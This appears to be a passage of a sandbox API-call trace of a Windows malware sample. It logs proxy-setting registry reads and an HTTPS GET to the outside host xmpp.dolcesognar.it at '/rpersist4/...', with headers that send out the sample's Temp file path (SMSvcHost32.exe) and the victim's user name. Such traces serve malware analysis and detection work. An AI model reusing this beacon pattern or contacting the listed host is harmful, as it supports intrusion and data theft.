	[0098.409] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-Proxy-Present: FALSE", dwHeadersLength=0x16, dwModifiers=0x10000000) returned 1
	[0098.409] lstrlenW (lpString="X-Proxy-Used: FALSE") returned 19
	[0098.410] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-Proxy-Used: FALSE", dwHeadersLength=0x13, dwModifiers=0x10000000) returned 1
	[0098.410] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x205f2c8 | out: phkResult=0x205f2c8*=0x2e8) returned 0x0
	[0098.410] RegQueryValueExW (in: hKey=0x2e8, lpValueName="AutoDetect", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x205f2cc*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x205f2cc*=0x0) returned 0x2
	[0098.410] RegCloseKey (hKey=0x2e8) returned 0x0
	[0098.410] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-Proxy-AutoDetect: FALSE", dwHeadersLength=0x19, dwModifiers=0x10000000) returned 1
	[0098.411] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x205fb1c, lpdwBufferLength=0x205fafc | out: lpBuffer=0x205fb1c, lpdwBufferLength=0x205fafc) returned 1
	[0098.411] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x205fb1c, dwBufferLength=0x4) returned 1
	[0098.411] HttpSendRequestA (in: hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0 | out: lpOptional=0x0*) returned 1
	[0111.955] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x205fb24, lpdwBufferLength=0x205fb28, lpdwIndex=0x0 | out: lpBuffer=0x205fb24*, lpdwBufferLength=0x205fb28*=0x4, lpdwIndex=0x0) returned 1
	[0111.955] InternetCloseHandle (hInternet=0xcc000c) returned 1
	[0111.955] InternetCloseHandle (hInternet=0xcc0008) returned 1
	[0111.955] InternetCloseHandle (hInternet=0xcc0004) returned 1
	[0111.955] GetLastError () returned 0x0
	[0111.955] GetLastError () returned 0x0
	[0111.955] GetLastError () returned 0x0
	[0111.955] GetLastError () returned 0x0
	[0111.955] GetLastError () returned 0x0
	[0111.955] GetLastError () returned 0x0
	[0111.955] GetLastError () returned 0x0
	[0111.955] GetLastError () returned 0x0
	[0111.955] GetLastError () returned 0x0
	[0111.955] GetLastError () returned 0x0
	[0111.955] GetLastError () returned 0x0
	[0111.955] GetLastError () returned 0x0
	[0111.955] GetLastError () returned 0x0
	[0111.955] GetLastError () returned 0x0
	[0111.955] GetLastError () returned 0x0
	[0111.955] GetLastError () returned 0x0
	[0111.955] GetLastError () returned 0x0
	[0111.955] GetLastError () returned 0x0
	[0111.955] GetLastError () returned 0x0
	[0111.955] GetLastError () returned 0x0
	[0111.955] GetLastError () returned 0x0
	[0111.955] GetLastError () returned 0x0
	[0111.955] GetLastError () returned 0x0
	[0111.955] GetLastError () returned 0x0
	[0111.955] GetLastError () returned 0x0
	[0111.955] GetLastError () returned 0x0
	[0111.955] GetLastError () returned 0x0
	[0111.955] GetLastError () returned 0x0
	[0111.955] GetLastError () returned 0x0
	[0111.955] GetLastError () returned 0x0
	[0111.955] GetLastError () returned 0x0
	[0111.955] GetLastError () returned 0x0
	[0111.956] GetLastError () returned 0x0
	[0111.956] GetLastError () returned 0x0
	[0111.956] GetLastError () returned 0x0
	[0111.956] GetLastError () returned 0x0
	[0111.956] GetLastError () returned 0x0
	[0111.956] GetLastError () returned 0x0
	[0111.956] GetLastError () returned 0x0
	[0111.956] GetLastError () returned 0x0
	[0111.956] GetLastError () returned 0x0
	[0111.956] GetLastError () returned 0x0
	[0111.956] GetLastError () returned 0x0
	[0111.956] GetLastError () returned 0x0
	[0111.956] GetLastError () returned 0x0
	[0111.956] GetLastError () returned 0x0
	[0111.956] GetLastError () returned 0x0
	[0111.956] GetLastError () returned 0x0
	[0111.956] GetLastError () returned 0x0
	[0111.956] GetLastError () returned 0x0
	[0111.956] GetLastError () returned 0x0
	[0111.956] GetLastError () returned 0x0
	[0111.956] GetLastError () returned 0x0
	[0111.956] GetLastError () returned 0x0
	[0111.956] GetLastError () returned 0x0
	[0111.956] GetLastError () returned 0x0
	[0111.956] GetLastError () returned 0x0
	[0111.956] GetLastError () returned 0x0
	[0111.956] GetLastError () returned 0x0
	[0111.956] GetLastError () returned 0x0
	[0111.956] GetLastError () returned 0x0
	[0111.956] GetLastError () returned 0x0
	[0111.956] GetLastError () returned 0x0
	[0111.956] GetLastError () returned 0x0
	[0111.956] GetLastError () returned 0x0
	[0111.956] GetLastError () returned 0x0
	[0111.956] GetLastError () returned 0x0
	[0111.956] GetLastError () returned 0x0
	[0111.956] GetLastError () returned 0x0
	[0111.956] GetLastError () returned 0x0
	[0111.956] GetLastError () returned 0x0
	[0111.956] GetLastError () returned 0x0
	[0111.956] GetLastError () returned 0x0
	[0111.956] GetLastError () returned 0x0
	[0111.956] GetLastError () returned 0x0
	[0111.956] GetLastError () returned 0x0
	[0111.956] GetLastError () returned 0x0
	[0111.956] GetLastError () returned 0x0
	[0111.956] GetLastError () returned 0x0
	[0111.956] GetLastError () returned 0x0
	[0111.956] GetLastError () returned 0x0
	[0111.956] GetLastError () returned 0x0
	[0111.956] GetLastError () returned 0x0
	[0111.956] GetLastError () returned 0x0
	[0111.956] GetLastError () returned 0x0
	[0111.956] GetLastError () returned 0x0
	[0111.956] GetLastError () returned 0x0
	[0111.956] GetLastError () returned 0x0
	[0111.956] GetLastError () returned 0x0
	[0111.956] GetLastError () returned 0x0
	[0111.956] GetLastError () returned 0x0
	[0111.957] GetLastError () returned 0x0
	[0111.957] GetLastError () returned 0x0
	[0111.957] GetLastError () returned 0x0
	[0111.957] GetLastError () returned 0x0
	[0111.957] GetLastError () returned 0x0
	[0111.957] GetLastError () returned 0x0
	[0111.957] GetLastError () returned 0x0
	[0111.957] GetLastError () returned 0x0
	[0111.957] GetLastError () returned 0x0
	[0111.957] GetLastError () returned 0x0
	[0111.957] GetLastError () returned 0x0
	[0111.957] GetLastError () returned 0x0
	[0111.957] GetLastError () returned 0x0
	[0111.957] GetLastError () returned 0x0
	[0111.957] GetLastError () returned 0x0
	[0111.957] GetLastError () returned 0x0
	[0111.957] GetLastError () returned 0x0
	[0111.957] GetLastError () returned 0x0
	[0111.957] GetLastError () returned 0x0
	[0111.957] GetLastError () returned 0x0
	[0111.957] GetLastError () returned 0x0
	[0111.957] GetLastError () returned 0x0
	[0111.957] GetLastError () returned 0x0
	[0111.957] GetLastError () returned 0x0
	[0111.957] GetLastError () returned 0x0
	[0111.957] GetLastError () returned 0x0
	[0111.957] GetLastError () returned 0x0
	[0111.957] GetLastError () returned 0x0
	[0111.957] GetLastError () returned 0x0
	[0111.957] GetLastError () returned 0x0
	[0111.957] GetLastError () returned 0x0
	[0111.957] GetLastError () returned 0x0
	[0111.957] GetLastError () returned 0x0
	[0111.957] GetLastError () returned 0x0
	[0111.957] GetLastError () returned 0x0
	[0111.957] GetLastError () returned 0x0
	[0111.957] GetLastError () returned 0x0
	[0111.957] GetLastError () returned 0x0
	[0111.957] GetLastError () returned 0x0
	[0111.957] GetLastError () returned 0x0
	[0111.957] GetLastError () returned 0x0
	[0111.957] GetLastError () returned 0x0
	[0111.957] GetLastError () returned 0x0
	[0111.957] GetLastError () returned 0x0
	[0111.957] GetLastError () returned 0x0
	[0111.957] GetLastError () returned 0x0
	[0111.957] GetLastError () returned 0x0
	[0111.957] GetLastError () returned 0x0
	[0111.957] GetLastError () returned 0x0
	[0111.957] GetLastError () returned 0x0
	[0111.957] GetLastError () returned 0x0
	[0111.957] GetLastError () returned 0x0
	[0111.957] GetLastError () returned 0x0
	[0111.957] GetLastError () returned 0x0
	[0111.957] GetLastError () returned 0x0
	[0111.957] GetLastError () returned 0x0
	[0111.957] GetLastError () returned 0x0
	[0111.957] GetLastError () returned 0x0
	[0111.957] GetLastError () returned 0x0
	[0111.957] GetLastError () returned 0x0
	[0111.957] GetLastError () returned 0x0
	[0111.957] GetLastError () returned 0x0
	[0111.957] GetLastError () returned 0x0
	[0111.958] GetLastError () returned 0x0
	[0111.958] GetLastError () returned 0x0
	[0111.958] GetLastError () returned 0x0
	[0111.958] GetLastError () returned 0x0
	[0111.958] GetLastError () returned 0x0
	[0111.958] GetLastError () returned 0x0
	[0111.958] GetLastError () returned 0x0
	[0111.958] GetLastError () returned 0x0
	[0111.958] GetLastError () returned 0x0
	[0111.958] GetLastError () returned 0x0
	[0111.958] GetLastError () returned 0x0
	[0111.958] GetLastError () returned 0x0
	[0111.958] GetLastError () returned 0x0
	[0111.958] GetLastError () returned 0x0
	[0111.958] GetLastError () returned 0x0
	[0111.958] GetLastError () returned 0x0
	[0111.958] GetLastError () returned 0x0
	[0111.958] GetLastError () returned 0x0
	[0111.958] GetLastError () returned 0x0
	[0111.958] GetLastError () returned 0x0
	[0111.958] GetLastError () returned 0x0
	[0111.958] GetLastError () returned 0x0
	[0111.958] GetLastError () returned 0x0
	[0111.958] GetLastError () returned 0x0
	[0111.958] GetLastError () returned 0x0
	[0111.958] GetLastError () returned 0x0
	[0111.958] GetLastError () returned 0x0
	[0111.958] GetLastError () returned 0x0
	[0111.958] GetLastError () returned 0x0
	[0111.958] GetLastError () returned 0x0
	[0111.958] GetLastError () returned 0x0
	[0111.958] GetLastError () returned 0x0
	[0111.958] GetLastError () returned 0x0
	[0111.958] GetLastError () returned 0x0
	[0111.958] GetLastError () returned 0x0
	[0111.958] GetLastError () returned 0x0
	[0111.958] GetLastError () returned 0x0
	[0111.958] GetLastError () returned 0x0
	[0111.958] GetLastError () returned 0x0
	[0111.958] GetLastError () returned 0x0
	[0111.958] GetLastError () returned 0x0
	[0111.958] GetLastError () returned 0x0
	[0111.958] GetLastError () returned 0x0
	[0111.958] GetLastError () returned 0x0
	[0111.958] GetLastError () returned 0x0
	[0111.958] GetLastError () returned 0x0
	[0111.958] GetLastError () returned 0x0
	[0111.958] GetLastError () returned 0x0
	[0111.958] GetLastError () returned 0x0
	[0111.958] GetLastError () returned 0x0
	[0111.958] GetLastError () returned 0x0
	[0111.958] GetLastError () returned 0x0
	[0111.958] GetLastError () returned 0x0
	[0111.958] GetLastError () returned 0x0
	[0111.958] GetLastError () returned 0x0
	[0111.958] GetLastError () returned 0x0
	[0111.958] GetLastError () returned 0x0
	[0111.958] GetLastError () returned 0x0
	[0111.959] GetLastError () returned 0x0
	[0111.959] GetLastError () returned 0x0
	[0111.959] GetLastError () returned 0x0
	[0111.959] GetLastError () returned 0x0
	[0111.959] GetLastError () returned 0x0
	[0111.959] GetLastError () returned 0x0
	[0111.959] GetLastError () returned 0x0
	[0111.959] GetLastError () returned 0x0
	[0111.959] GetLastError () returned 0x0
	[0111.959] GetLastError () returned 0x0
	[0111.959] GetLastError () returned 0x0
	[0111.959] GetLastError () returned 0x0
	[0111.959] GetLastError () returned 0x0
	[0111.959] GetLastError () returned 0x0
	[0111.959] GetLastError () returned 0x0
	[0111.959] GetLastError () returned 0x0
	[0111.959] GetLastError () returned 0x0
	[0111.959] GetLastError () returned 0x0
	[0111.959] GetLastError () returned 0x0
	[0111.959] GetLastError () returned 0x0
	[0111.959] GetLastError () returned 0x0
	[0111.959] GetLastError () returned 0x0
	[0111.959] GetLastError () returned 0x0
	[0111.959] GetLastError () returned 0x0
	[0111.959] GetLastError () returned 0x0
	[0111.959] GetLastError () returned 0x0
	[0111.959] GetLastError () returned 0x0
	[0111.959] GetLastError () returned 0x0
	[0111.959] GetLastError () returned 0x0
	[0111.959] GetLastError () returned 0x0
	[0111.959] GetLastError () returned 0x0
	[0111.959] GetLastError () returned 0x0
	[0111.959] GetLastError () returned 0x0
	[0111.959] GetLastError () returned 0x0
	[0111.959] GetLastError () returned 0x0
	[0111.959] GetLastError () returned 0x0
	[0111.959] GetLastError () returned 0x0
	[0111.959] GetLastError () returned 0x0
	[0111.959] GetLastError () returned 0x0
	[0111.959] GetLastError () returned 0x0
	[0111.959] GetLastError () returned 0x0
	[0111.959] GetLastError () returned 0x0
	[0111.959] GetLastError () returned 0x0
	[0111.959] GetLastError () returned 0x0
	[0111.959] GetLastError () returned 0x0
	[0111.959] GetLastError () returned 0x0
	[0111.959] GetLastError () returned 0x0
	[0111.959] GetLastError () returned 0x0
	[0111.959] GetLastError () returned 0x0
	[0111.959] GetLastError () returned 0x0
	[0111.959] GetLastError () returned 0x0
	[0111.959] GetLastError () returned 0x0
	[0111.959] GetLastError () returned 0x0
	[0111.959] GetLastError () returned 0x0
	[0111.959] GetLastError () returned 0x0
	[0111.959] GetLastError () returned 0x0
	[0111.959] GetLastError () returned 0x0
	[0111.959] GetLastError () returned 0x0
	[0111.959] GetLastError () returned 0x0
	[0111.959] GetLastError () returned 0x0
	[0111.959] GetLastError () returned 0x0
	[0111.959] GetLastError () returned 0x0
	[0111.959] GetLastError () returned 0x0
	[0111.960] GetLastError () returned 0x0
	[0111.971] GetLastError () returned 0x0
	[0111.971] GetLastError () returned 0x0
	[0111.971] GetLastError () returned 0x0
	[0111.971] GetLastError () returned 0x0
	[0111.971] GetLastError () returned 0x0
	[0111.971] GetLastError () returned 0x0
	[0111.971] GetLastError () returned 0x0
	[0111.971] GetLastError () returned 0x0
	[0111.971] GetLastError () returned 0x0
	[0111.971] GetLastError () returned 0x0
	[0111.971] GetLastError () returned 0x0
	[0111.971] GetLastError () returned 0x0
	[0111.971] GetLastError () returned 0x0
	[0111.971] GetLastError () returned 0x0
	[0111.971] GetLastError () returned 0x0
	[0111.971] GetLastError () returned 0x0
	[0111.971] GetLastError () returned 0x0
	[0111.971] GetLastError () returned 0x0
	[0111.971] GetLastError () returned 0x0
	[0111.971] GetLastError () returned 0x0
	[0111.971] GetLastError () returned 0x0
	[0111.971] GetLastError () returned 0x0
	[0111.971] GetLastError () returned 0x0
	[0111.971] GetLastError () returned 0x0
	[0111.972] GetLastError () returned 0x0
	[0111.972] GetLastError () returned 0x0
	[0111.972] GetLastError () returned 0x0
	[0111.972] GetLastError () returned 0x0
	[0111.972] GetLastError () returned 0x0
	[0111.972] GetLastError () returned 0x0
	[0111.972] GetLastError () returned 0x0
	[0111.972] GetLastError () returned 0x0
	[0111.972] GetLastError () returned 0x0
	[0111.972] GetLastError () returned 0x0
	[0111.972] GetLastError () returned 0x0
	[0111.972] GetLastError () returned 0x0
	[0111.972] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x205f8d8 | out: phkResult=0x205f8d8*=0x2dc) returned 0x0
	[0111.972] RegQueryValueExW (in: hKey=0x2dc, lpValueName="ProxyEnable", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x205f8dc*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x205f8dc*=0x4) returned 0x0
	[0111.973] RegQueryValueExW (in: hKey=0x2dc, lpValueName="ProxyEnable", lpReserved=0x0, lpType=0x0, lpData=0x69d6f8, lpcbData=0x205f8dc*=0x4 | out: lpType=0x0, lpData=0x69d6f8*=0x0, lpcbData=0x205f8dc*=0x4) returned 0x0
	[0111.973] RegCloseKey (hKey=0x2dc) returned 0x0
	[0111.973] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/21000101 Firefox/25.0", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004
	[0111.973] InternetConnectA (hInternet=0xcc0004, lpszServerName="xmpp.dolcesognar.it", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008
	[0111.973] GetLastError () returned 0x0
	[0111.973] GetLastError () returned 0x0
	[0111.973] GetLastError () returned 0x0
	[0111.973] GetLastError () returned 0x0
	[0111.973] GetLastError () returned 0x0
	[0111.973] GetLastError () returned 0x0
	[0111.973] GetLastError () returned 0x0
	[0111.973] GetLastError () returned 0x0
	[0111.973] GetLastError () returned 0x0
	[0111.973] GetLastError () returned 0x0
	[0111.973] GetLastError () returned 0x0
	[0111.973] GetLastError () returned 0x0
	[0111.973] GetLastError () returned 0x0
	[0111.973] GetLastError () returned 0x0
	[0111.973] GetLastError () returned 0x0
	[0111.973] GetLastError () returned 0x0
	[0111.973] GetLastError () returned 0x0
	[0111.973] GetLastError () returned 0x0
	[0111.973] GetLastError () returned 0x0
	[0111.973] GetLastError () returned 0x0
	[0111.973] GetLastError () returned 0x0
	[0111.973] GetLastError () returned 0x0
	[0111.973] GetLastError () returned 0x0
	[0111.973] GetLastError () returned 0x0
	[0111.973] GetLastError () returned 0x0
	[0111.973] GetLastError () returned 0x0
	[0111.973] GetLastError () returned 0x0
	[0111.973] GetLastError () returned 0x0
	[0111.973] GetLastError () returned 0x0
	[0111.973] GetLastError () returned 0x0
	[0111.973] GetLastError () returned 0x0
	[0111.973] GetLastError () returned 0x0
	[0111.973] GetLastError () returned 0x0
	[0111.974] GetLastError () returned 0x0
	[0111.974] GetLastError () returned 0x0
	[0111.974] GetLastError () returned 0x0
	[0111.974] GetLastError () returned 0x0
	[0111.974] GetLastError () returned 0x0
	[0111.974] GetLastError () returned 0x0
	[0111.974] GetLastError () returned 0x0
	[0111.974] GetLastError () returned 0x0
	[0111.974] GetLastError () returned 0x0
	[0111.974] GetLastError () returned 0x0
	[0111.974] GetLastError () returned 0x0
	[0111.974] GetLastError () returned 0x0
	[0111.974] GetLastError () returned 0x0
	[0111.974] GetLastError () returned 0x0
	[0111.974] GetLastError () returned 0x0
	[0111.974] GetLastError () returned 0x0
	[0111.974] GetLastError () returned 0x0
	[0111.974] GetLastError () returned 0x0
	[0111.974] GetLastError () returned 0x0
	[0111.974] GetLastError () returned 0x0
	[0111.974] GetLastError () returned 0x0
	[0111.974] GetLastError () returned 0x0
	[0111.974] GetLastError () returned 0x0
	[0111.974] GetLastError () returned 0x0
	[0111.974] GetLastError () returned 0x0
	[0111.974] GetLastError () returned 0x0
	[0111.974] GetLastError () returned 0x0
	[0111.974] GetLastError () returned 0x0
	[0111.974] GetLastError () returned 0x0
	[0111.974] GetLastError () returned 0x0
	[0111.974] GetLastError () returned 0x0
	[0111.974] GetLastError () returned 0x0
	[0111.974] GetLastError () returned 0x0
	[0111.974] GetLastError () returned 0x0
	[0111.974] GetLastError () returned 0x0
	[0111.974] GetLastError () returned 0x0
	[0111.974] GetLastError () returned 0x0
	[0111.974] GetLastError () returned 0x0
	[0111.974] GetLastError () returned 0x0
	[0111.974] GetLastError () returned 0x0
	[0111.974] GetLastError () returned 0x0
	[0111.974] GetLastError () returned 0x0
	[0111.974] GetLastError () returned 0x0
	[0111.974] GetLastError () returned 0x0
	[0111.974] GetLastError () returned 0x0
	[0111.974] GetLastError () returned 0x0
	[0111.974] GetLastError () returned 0x0
	[0111.974] GetLastError () returned 0x0
	[0111.974] GetLastError () returned 0x0
	[0111.974] GetLastError () returned 0x0
	[0111.974] GetLastError () returned 0x0
	[0111.974] GetLastError () returned 0x0
	[0111.974] GetLastError () returned 0x0
	[0111.974] GetLastError () returned 0x0
	[0111.974] GetLastError () returned 0x0
	[0111.974] GetLastError () returned 0x0
	[0111.975] GetLastError () returned 0x0
	[0111.975] GetLastError () returned 0x0
	[0111.975] GetLastError () returned 0x0
	[0111.975] GetLastError () returned 0x0
	[0111.975] GetLastError () returned 0x0
	[0111.975] GetLastError () returned 0x0
	[0111.975] GetLastError () returned 0x0
	[0111.975] GetLastError () returned 0x0
	[0111.975] GetLastError () returned 0x0
	[0111.975] GetLastError () returned 0x0
	[0111.975] GetLastError () returned 0x0
	[0111.975] GetLastError () returned 0x0
	[0111.975] GetLastError () returned 0x0
	[0111.975] GetLastError () returned 0x0
	[0111.975] GetLastError () returned 0x0
	[0111.975] GetLastError () returned 0x0
	[0111.975] GetLastError () returned 0x0
	[0111.975] GetLastError () returned 0x0
	[0111.975] GetLastError () returned 0x0
	[0111.975] GetLastError () returned 0x0
	[0111.975] GetLastError () returned 0x0
	[0111.975] GetLastError () returned 0x0
	[0111.975] GetLastError () returned 0x0
	[0111.975] GetLastError () returned 0x0
	[0111.975] GetLastError () returned 0x0
	[0111.975] GetLastError () returned 0x0
	[0111.975] GetLastError () returned 0x0
	[0111.975] GetLastError () returned 0x0
	[0111.975] GetLastError () returned 0x0
	[0111.975] GetLastError () returned 0x0
	[0111.975] GetLastError () returned 0x0
	[0111.975] GetLastError () returned 0x0
	[0111.975] GetLastError () returned 0x0
	[0111.975] GetLastError () returned 0x0
	[0111.975] GetLastError () returned 0x0
	[0111.975] GetLastError () returned 0x0
	[0111.975] GetLastError () returned 0x0
	[0111.975] GetLastError () returned 0x0
	[0111.975] GetLastError () returned 0x0
	[0111.975] lstrlenA (lpString="/rpersist4/1197631235") returned 21
	[0111.975] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x205fe8c, cbMultiByte=-1, lpWideCharStr=0x73c608, cchWideChar=22 | out: lpWideCharStr="/rpersist4/1197631235") returned 22
	[0111.975] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/rpersist4/1197631235", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x84800300, dwContext=0x0) returned 0xcc000c
	[0111.975] GetLastError () returned 0x0
	[0111.975] GetLastError () returned 0x0
	[0111.975] GetLastError () returned 0x0
	[0111.975] GetLastError () returned 0x0
	[0111.976] GetLastError () returned 0x0
	[0111.976] GetLastError () returned 0x0
	[0111.976] GetLastError () returned 0x0
	[0111.976] GetLastError () returned 0x0
	[0111.976] GetLastError () returned 0x0
	[0111.976] GetLastError () returned 0x0
	[0111.976] GetLastError () returned 0x0
	[0111.976] GetLastError () returned 0x0
	[0111.976] GetLastError () returned 0x0
	[0111.976] GetLastError () returned 0x0
	[0111.976] GetLastError () returned 0x0
	[0111.976] GetLastError () returned 0x0
	[0111.976] GetLastError () returned 0x0
	[0111.976] GetLastError () returned 0x0
	[0111.976] GetLastError () returned 0x0
	[0111.976] GetLastError () returned 0x0
	[0111.976] GetLastError () returned 0x0
	[0111.976] GetLastError () returned 0x0
	[0111.976] GetLastError () returned 0x0
	[0111.976] GetLastError () returned 0x0
	[0111.976] GetLastError () returned 0x0
	[0111.976] GetLastError () returned 0x0
	[0111.976] GetLastError () returned 0x0
	[0111.976] GetLastError () returned 0x0
	[0111.976] GetLastError () returned 0x0
	[0111.976] GetLastError () returned 0x0
	[0111.976] GetLastError () returned 0x0
	[0111.976] GetLastError () returned 0x0
	[0111.976] GetLastError () returned 0x0
	[0111.976] GetLastError () returned 0x0
	[0111.976] GetLastError () returned 0x0
	[0111.976] GetLastError () returned 0x0
	[0111.976] GetLastError () returned 0x0
	[0111.976] GetLastError () returned 0x0
	[0111.976] GetLastError () returned 0x0
	[0111.976] GetLastError () returned 0x0
	[0111.976] GetLastError () returned 0x0
	[0111.976] GetLastError () returned 0x0
	[0111.976] GetLastError () returned 0x0
	[0111.976] GetLastError () returned 0x0
	[0111.976] GetLastError () returned 0x0
	[0111.976] GetLastError () returned 0x0
	[0111.976] GetLastError () returned 0x0
	[0111.977] GetLastError () returned 0x0
	[0111.977] GetLastError () returned 0x0
	[0111.977] GetLastError () returned 0x0
	[0111.977] GetLastError () returned 0x0
	[0111.977] GetLastError () returned 0x0
	[0111.977] GetLastError () returned 0x0
	[0111.977] GetLastError () returned 0x0
	[0111.977] GetLastError () returned 0x0
	[0111.977] GetLastError () returned 0x0
	[0111.977] GetLastError () returned 0x0
	[0111.977] GetLastError () returned 0x0
	[0111.977] wsprintfW (in: param_1=0x669f08, param_2="X-File-Name: %s" | out: param_1="X-File-Name: C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe") returned 65
	[0111.977] lstrlenW (lpString="X-File-Name: C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe") returned 65
	[0111.977] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-File-Name: C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe", dwHeadersLength=0x41, dwModifiers=0x10000000) returned 1
	[0111.977] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x68af98, nSize=0x205f2bc | out: lpNameBuffer="X2VS1CUM\\Nd9E1FYi", nSize=0x205f2bc) returned 0x1
	[0111.978] wsprintfW (in: param_1=0x669f08, param_2="X-User-Name: %s" | out: param_1="X-User-Name: X2VS1CUM\\Nd9E1FYi") returned 30
	[0111.978] lstrlenW (lpString="X-User-Name: X2VS1CUM\\Nd9E1FYi") returned 30
	[0111.978] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-User-Name: X2VS1CUM\\Nd9E1FYi", dwHeadersLength=0x1e, dwModifiers=0x10000000) returned 1
	[0111.978] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x205f2c4 | out: phkResult=0x205f2c4*=0x694) returned 0x0
	[0111.978] RegQueryValueExW (in: hKey=0x694, lpValueName="ProxyServer", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x205f29c*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x205f29c*=0x0) returned 0x2
	[0111.978] RegQueryValueExW (in: hKey=0x694, lpValueName="ProxyOverride", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x205f29c*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x205f29c*=0x0) returned 0x2
	[0111.978] RegQueryValueExW (in: hKey=0x694, lpValueName="AutoConfigURL", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x205f29c*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x205f29c*=0x0) returned 0x2
	[0111.978] RegCloseKey (hKey=0x694) returned 0x0
	[0111.978] GetLastError () returned 0x0
	[0111.978] GetLastError () returned 0x0
	[0111.978] GetLastError () returned 0x0
	[0111.978] GetLastError () returned 0x0
	[0111.978] GetLastError () returned 0x0
	[0111.978] GetLastError () returned 0x0
	[0111.978] GetLastError () returned 0x0
	[0111.978] GetLastError () returned 0x0
	[0111.978] GetLastError () returned 0x0
	[0111.978] GetLastError () returned 0x0
	[0111.978] GetLastError () returned 0x0
	[0111.978] GetLastError () returned 0x0
	[0111.978] GetLastError () returned 0x0
	[0111.978] GetLastError () returned 0x0
	[0111.978] GetLastError () returned 0x0
	[0111.978] GetLastError () returned 0x0
	[0111.978] GetLastError () returned 0x0
	[0111.978] GetLastError () returned 0x0
	[0111.978] GetLastError () returned 0x0
	[0111.978] GetLastError () returned 0x0
	[0111.978] GetLastError () returned 0x0
	[0111.978] GetLastError () returned 0x0
	[0111.978] GetLastError () returned 0x0
	[0111.978] GetLastError () returned 0x0
	[0111.978] GetLastError () returned 0x0
	[0111.978] GetLastError () returned 0x0
	[0111.978] GetLastError () returned 0x0
	[0111.978] GetLastError () returned 0x0
	[0111.978] GetLastError () returned 0x0
	[0111.978] GetLastError () returned 0x0
	[0111.979] GetLastError () returned 0x0
	[0111.979] GetLastError () returned 0x0
	[0111.979] GetLastError () returned 0x0
	[0111.979] GetLastError () returned 0x0
	[0111.979] GetLastError () returned 0x0
	[0111.979] GetLastError () returned 0x0
	[0111.979] GetLastError () returned 0x0
	[0111.979] GetLastError () returned 0x0
	[0111.979] GetLastError () returned 0x0
	[0111.979] GetLastError () returned 0x0
	[0111.979] GetLastError () returned 0x0
	[0111.979] GetLastError () returned 0x0
	[0111.979] GetLastError () returned 0x0
	[0111.979] GetLastError () returned 0x0
	[0111.979] GetLastError () returned 0x0
	[0111.979] GetLastError () returned 0x0
	[0111.979] GetLastError () returned 0x0
	[0111.979] GetLastError () returned 0x0
	[0111.979] GetLastError () returned 0x0
	[0111.979] GetLastError () returned 0x0
	[0111.979] GetLastError () returned 0x0
	[0111.979] GetLastError () returned 0x0
	[0111.979] GetLastError () returned 0x0
	[0111.979] GetLastError () returned 0x0
	[0111.979] GetLastError () returned 0x0
	[0111.979] GetLastError () returned 0x0
	[0111.979] GetLastError () returned 0x0
	[0111.979] GetLastError () returned 0x0
	[0111.979] GetLastError () returned 0x0
	[0111.979] GetLastError () returned 0x0
	[0111.979] GetLastError () returned 0x0
	[0111.979] GetLastError () returned 0x0
	[0111.979] GetLastError () returned 0x0
	[0111.979] GetLastError () returned 0x0
	[0111.979] GetLastError () returned 0x0
	[0111.979] GetLastError () returned 0x0
	[0111.979] GetLastError () returned 0x0
	[0111.979] GetLastError () returned 0x0
	[0111.979] GetLastError () returned 0x0
	[0111.979] GetLastError () returned 0x0
	[0111.979] GetLastError () returned 0x0
	[0111.979] GetLastError () returned 0x0
	[0111.979] GetLastError () returned 0x0
	[0111.979] GetLastError () returned 0x0
	[0111.979] GetLastError () returned 0x0
	[0111.979] GetLastError () returned 0x0
	[0111.979] GetLastError () returned 0x0
	[0111.980] GetLastError () returned 0x0
	[0111.980] GetLastError () returned 0x0
	[0111.980] GetLastError () returned 0x0
	[0111.980] GetLastError () returned 0x0
	[0111.980] GetLastError () returned 0x0
	[0111.980] GetLastError () returned 0x0
	[0111.980] GetLastError () returned 0x0
	[0111.980] GetLastError () returned 0x0
	[0111.980] GetLastError () returned 0x0
	[0111.980] GetLastError () returned 0x0
